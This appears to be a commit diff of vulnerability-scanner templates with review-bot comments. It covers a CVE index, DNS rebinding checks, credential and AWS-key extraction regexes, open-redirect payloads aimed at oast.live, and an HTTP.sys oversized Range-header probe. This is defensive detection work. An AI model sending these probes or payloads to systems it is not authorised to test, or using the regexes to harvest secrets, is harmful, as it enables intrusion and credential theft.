{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"}
{"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"}
@ -2270,18 +2279,34 @@
{"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"}
{"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"}
{"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"}
{"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"}
{"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"}
{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision Intercom Broadcasting System - Command Execution","Severity":"critical","Description":"Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"}
{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"}
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"}
{"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
{"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"}
{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"medium","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the sorting parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
{"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
{"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
{"ID":"CVE-2024-21887","Info":{"Name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","Severity":"critical","Description":"A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-21887.yaml"}
{"ID":"CVE-2024-21893","Info":{"Name":"Ivanti SAML - Server Side Request Forgery (SSRF)","Severity":"high","Description":"A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-21893.yaml"}
{"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"}
{"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"}
{"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"}
{"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"}
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}


@ -1 +1 @@
24979948d83a1e549dbe56133dba3db5
d1c0809e63305403ca431401cfcebe07


@ -1,5 +1,4 @@
id: dns-rebinding
info:
name: DNS Rebinding Attack
author: ricardomaia
@ -10,6 +9,8 @@ info:
- https://capec.mitre.org/data/definitions/275.html
- https://payatu.com/blog/dns-rebinding/
- https://heimdalsecurity.com/blog/dns-rebinding/
metadata:
max-request: 2
tags: redirect,dns,network
dns:
@ -20,7 +21,7 @@ dns:
- type: regex
part: answer
regex:
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
- 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
extractors:
- type: regex
@ -28,35 +29,22 @@ dns:
name: IPv4
group: 1
regex:
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
- 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
- name: "{{FQDN}}"
type: AAAA
matchers:
# IPv6 Compressed
# IPv6 Compressed and Full
- type: regex
part: answer
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
# IPv6
- type: regex
part: answer
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
- "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
extractors:
- type: regex
part: answer
name: IPv6_Compressed
name: IPv6_ULA
group: 1
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
- type: regex
part: answer
name: IPv6
group: 1
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
# digest: 4a0a004730450221009a895344f0f4bf8d0444566a7a2392d2074708d88d29a0922ebb71935290785702200a338fe1517c225d45750b08f80f3a903cd5925a32c542b5559f0202173732be:922c64590222798bb761d5b6d8e72950
- "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
# digest: 4b0a00483046022100f31fd9369022bcafe6da846b246069391f1c22137b8024bb71905634ffa56673022100ea3679256b9518c8853b42432e216d4da6ff3e88ebee349b67e8e8ba7d8a13e1:922c64590222798bb761d5b6d8e72950
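Review bot: The rewritten A-record matcher regex (`IN\s+A\s+(...)$` under `part: answer`) keeps a `$` anchor while the extractor two blocks below uses the same pattern without it; if the regex engine treats `$` as end-of-input by default (Go's regexp does unless `(?m)` is set, and nuclei is Go-based), a private-range answer that is not the last line of the answer section is extracted but never matched, so dropping the `$` or prefixing `(?m)` keeps the two in step. The IPv4 alternation covers only `127.0.0.1` and the RFC1918 ranges; rebinding answers pointing at `0.0.0.0` or the `169.254.0.0/16` link-local range are common enough that adding `0\.0\.0\.0|169\.254\.\d{1,3}\.\d{1,3}` to the group is worth considering. The new AAAA pattern `fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7}` lets every group be empty, so it accepts `fd00:::::` as readily as `fd00::`; harmless for detection but worth a one-line comment so nobody "fixes" it into an address validator. The `dns:` block starts outside these hunks.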


@ -18,7 +18,7 @@ file:
- type: regex
name: extracted-token
regex:
- "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+"
- "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token|secretaccesskey)([-|_][a-z]+)?(\\s)*(:|=)+"
- type: regex
name: extracted-endpoints
@ -30,5 +30,9 @@ file:
- type: regex
name: extracted-uri
regex:
- "(?i)([a-z]{0,10}):(//|/)[a-z0-9\\./?&-_=:]+"
# digest: 4a0a00473045022074fd41f8b59517248d39216756a55be729fe598400825417fc9ab281c4c626d6022100f3a770bad05731314a45020b4a94b393b96dfae3590e0e526327ac84fa760aa2:922c64590222798bb761d5b6d8e72950
- "(?i)([a-z]{2,10}):(//|/)[a-z0-9\\./?&-_=:]+"
- type: regex
name: AMAZON-ACCES-KEY
regex:
- "(?i)(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
# digest: 4a0a0047304502200738658ef4985c1261c662fd545a23504b402343ad994af584866d74d37e11ac022100c8213e439b8a574bee55ce0881363c0964830df8255bcd89249d37a778f038ba:922c64590222798bb761d5b6d8e72950
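Review bot: The character class in the rewritten `extracted-uri` regex, `[a-z0-9\\./?&-_=:]`, contains an unescaped `&-_`, which is a range from `&` to `_` (covering digits, uppercase letters and `:;<=>?@[\]^`) rather than the three literal characters; `[a-z0-9./?&_=:-]` (dash last) or `&\\-_` makes the intent explicit, and the same class was already wrong on the old line. The `secretaccesskey` alternative added to `extracted-token` does not detect anything new: the pattern has no word boundary, so the existing `key` alternative already fires inside `secretaccesskey=`; the addition only widens the reported match to the whole name, which may be the intent and deserves a comment saying so. The new extractor name `AMAZON-ACCES-KEY` looks like a typo for `AMAZON-ACCESS-KEY`. All three extractors sit inside a `file:` block that starts outside the hunks.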


@ -1,4 +1,4 @@
id: linkedin-client-id
id: linkedin-id
info:
name: Linkedin Client ID
@ -13,4 +13,4 @@ file:
- type: regex
regex:
- "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}"
# digest: 4a0a004730450220331335d5d455d18c7d9c53325bd405f4c3af22856d39f387f303fc93bbea1047022100e773cfaf03d6e40a9c7bed4c68de155acaa563c01f97dab67d1d89641bf8ec4e:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502203d8afe36515a2055a46a90e36140bedad012308b2ee65ab71a018d3ebd0d502d022100e1ed5b6faf198657fe22358330ac6eb9dfbc042875faafbef04b8fa083eeecf9:922c64590222798bb761d5b6d8e72950


@ -20,7 +20,7 @@ info:
cve-id: CVE-2018-25031
cwe-id: CWE-20
epss-score: 0.00265
epss-percentile: 0.64105
epss-percentile: 0.65414
cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
metadata:
verified: true
@ -30,7 +30,6 @@ info:
shodan-query: http.component:"Swagger"
fofa-query: icon_hash="-1180440057"
tags: headless,cve,cve2018,swagger,xss,smartbear
headless:
- steps:
- args:
@ -71,4 +70,4 @@ headless:
words:
- "swagger"
case-insensitive: true
# digest: 4a0a00473045022013f081ac9ee7ec2705ebf232439f9b18c17b162f4e3bfc4485638f324af817df022100e3e262210320011237b59f2a16f32a64e4ad8aba204a3c0f23a4ecda48368644:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220276c4920b8b15fde2802ab2d829106243bfa1d1b5eec02e3ea13925bb1a2367f022012c9b9cb6e5b2906f68da10c6d0aa5c7462f847f906fc82ae576ac26db37fbbb:922c64590222798bb761d5b6d8e72950


@ -21,9 +21,6 @@ headless:
- action: waitload
payloads:
redirect:
- '%0a/oast.live/'
- '%0d/oast.live/'
- '%00/oast.live/'
- '%09/oast.live/'
- '%5C%5Coast.live/%252e%252e%252f'
- '%5Coast.live'
@ -112,10 +109,14 @@ headless:
- 'cgi-bin/redirect.cgi?oast.live'
- 'out?oast.live'
- 'login?to=http://oast.live'
- '#/oast.live'
- '%0a/oast.live/'
- '%0d/oast.live/'
- '%00/oast.live/'
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "Interactsh Server"
# digest: 4b0a00483046022100a8c70dc73a12a3a282a012774a3a10a99f153d80d4c16a01f2bb4bd9770903dc022100f491074035d26885797db4152bad2ecd436ebf4d1f7fa479d402303ceac17db0:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206753621bcdaff325fba22dd398200a7dd47f6959b40403a98fa2f3afeb17be380220103cac0ac968c27495b35cc3a61ae6fb152dfa0f35953c3c23b3e36110d194a7:922c64590222798bb761d5b6d8e72950
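Review bot: The control-character payloads (`%0a`, `%0d`, `%00`) are moved from the head of the `redirect` list to its tail with no comment explaining why; because `stop-at-first-match: true` sits a few lines below, payload order now decides which single payload gets reported, and the rationale will be lost to the next editor. A one-line comment above the moved entries, such as `# control-char payloads last: with stop-at-first-match the plain-path payloads are preferred`, would record it. The hunk counts suggest `%09/oast.live/` stays at the top while its three siblings move, which looks inconsistent and should be covered by the same comment if deliberate. The `redirect` list starts and ends outside the hunks.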



@ -0,0 +1,33 @@
id: CNVD-2023-96945
info:
name: McVie Safety Digital Management Platform - Arbitrary File Upload
author: DhiyaneshDk
severity: high
description: |
Jiangsu Maiwei Intelligent Technology Co., Ltd. is a software technology service provider focusing on customized development of software products. There is a file upload vulnerability in Jiangsu Maiwei Intelligent Technology Co., Ltd.'s safe production digital management platform. An attacker can use this vulnerability to gain server permissions.
reference:
- https://blog.csdn.net/weixin_42628854/article/details/136036109
metadata:
verified: true
max-request: 1
fofa-query: "安全生产数字化管理平台"
tags: cnvd,cnvd2023,file-upload,mcvie
http:
- method: GET
path:
- "{{BaseURL}}/Content/Plugins/uploader/FileChoose.html"
matchers-condition: and
matchers:
- type: word
words:
- "选择文件"
- "提交"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100d33058dc7925d488f441ffb20666552cfa61013c0e48bcd8629a20e46433b5c1022071721f25284dce9bbcfbf4c5b64289209d5deb92805c05fa23d9e5291b7a39f0:922c64590222798bb761d5b6d8e72950
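Review bot: The template is named and tagged as an arbitrary file upload, but the request is a plain GET for `/Content/Plugins/uploader/FileChoose.html` and the matchers only require the generic UI strings `选择文件` ("choose file") and `提交` ("submit") plus a 200, so a hit shows that the uploader page is reachable, not that uploads are unauthenticated or unrestricted, and any product built on the same uploader component would match as well. Either a product-specific marker (a title, script name or banner unique to this platform) should join the word matcher, or the `description` should say that the template detects the exposed uploader page rather than confirming the upload flaw. The `info` block also lacks the `classification` section (cvss/cwe) that the CVE templates in this commit carry.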


@ -20,8 +20,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2014-6271
cwe-id: CWE-78
epss-score: 0.97564
epss-percentile: 0.99999
epss-score: 0.97559
epss-percentile: 0.99997
cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
metadata:
max-request: 8
@ -58,4 +58,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502203c32ed699b5b5784b8f6eddd60a3c06b1a1c8dbefd3024f425307f8f793e0f64022100e4987775a712348ab69dbb368677664e21d2d753a3ba22ab15c2dcd0d426cf49:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022022d9c0adae74cdc979a9807c7b6c229b34bbaf77fdf9fb5edbd4263a3e3d939d022100bff54d932fc7f8bc11b979b2289b87a588833b45578f1945d5e8dc9a7021354b:922c64590222798bb761d5b6d8e72950


@ -21,7 +21,7 @@ info:
cve-id: CVE-2014-8799
cwe-id: CWE-22
epss-score: 0.17844
epss-percentile: 0.95686
epss-percentile: 0.96002
cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@ -50,4 +50,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502206a7436cc97bf8ecebcb667d7af15dcf23669c6fe4558d8041af31eb305bc605e022100f724c31ae974833f30f077f071146f044c59dd077af802bcc254aaa7e7f82ee2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100c44ca338e0e27aef8473eed734aaf201ffdbd8635955e4b8e4cbfb37f596bd5802202fa69ab04ca34891ed8896145cbd8e1af1443228c1e766e1cc8f6591c0e74f45:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,47 @@
id: CVE-2015-1635
info:
name: Microsoft Windows 'HTTP.sys' - Remote Code Execution
author: Phillipo
severity: critical
description: |
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
reference:
- https://www.exploit-db.com/exploits/36773
- https://www.securitysift.com/an-analysis-of-ms15-034/
- https://nvd.nist.gov/vuln/detail/CVE-2015-1635
classification:
cvss-metrics: AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10.0
cwe-id: CWE-94
cve-id: CVE-2015-1635
cpe: cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: microsoft
product: windows_7
shodan-query: '"Microsoft-IIS" "2015"'
tags: cve,cve2015,kev,microsoft,iis,rce
http:
- method: GET
path:
- "{{BaseURL}}"
headers:
Range: "bytes=0-18446744073709551615"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "HTTP Error 416"
- "The requested range is not satisfiable"
condition: and
- type: word
part: header
words:
- "Microsoft"
# digest: 4b0a0048304602210089c354040a56574a5a17f803370b94a87244e98159c6eff1b1b07f666e2c834a022100936fbfa7282962b47f7de82e84e67d0cc32921b313c84406269eef740f6ccec0:922c64590222798bb761d5b6d8e72950
